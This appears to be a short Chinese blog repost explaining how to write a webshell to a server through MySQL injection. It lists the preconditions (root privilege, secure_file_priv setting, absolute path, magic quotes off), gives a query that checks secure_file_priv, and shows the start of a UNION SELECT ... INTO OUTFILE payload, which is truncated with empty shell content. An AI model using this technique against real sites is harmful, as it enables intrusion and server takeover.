mysql注入getshell
Posted Dark1nt
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了mysql注入getshell相关的知识,希望对你有一定的参考价值。
0x00 利用条件
- root权限
- secure_file_priv=为空或者在网站根目录下(网站根目录为d:\\www,secure_file_priv=d:\\也可以)
- 知道绝对路径
- gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号
0x01 查看secure_file_priv设置
show global variables like \'%secure_file_priv%\';
查询结果
- 5.7.26为null,5.5.29为空
这里为NULL
0x02 联合注入写shell
select * from users where id=-1 union select 1,2,\'\' into outfile \'D
以上是关于mysql注入getshell的主要内容,如果未能解决你的问题,请参考以下文章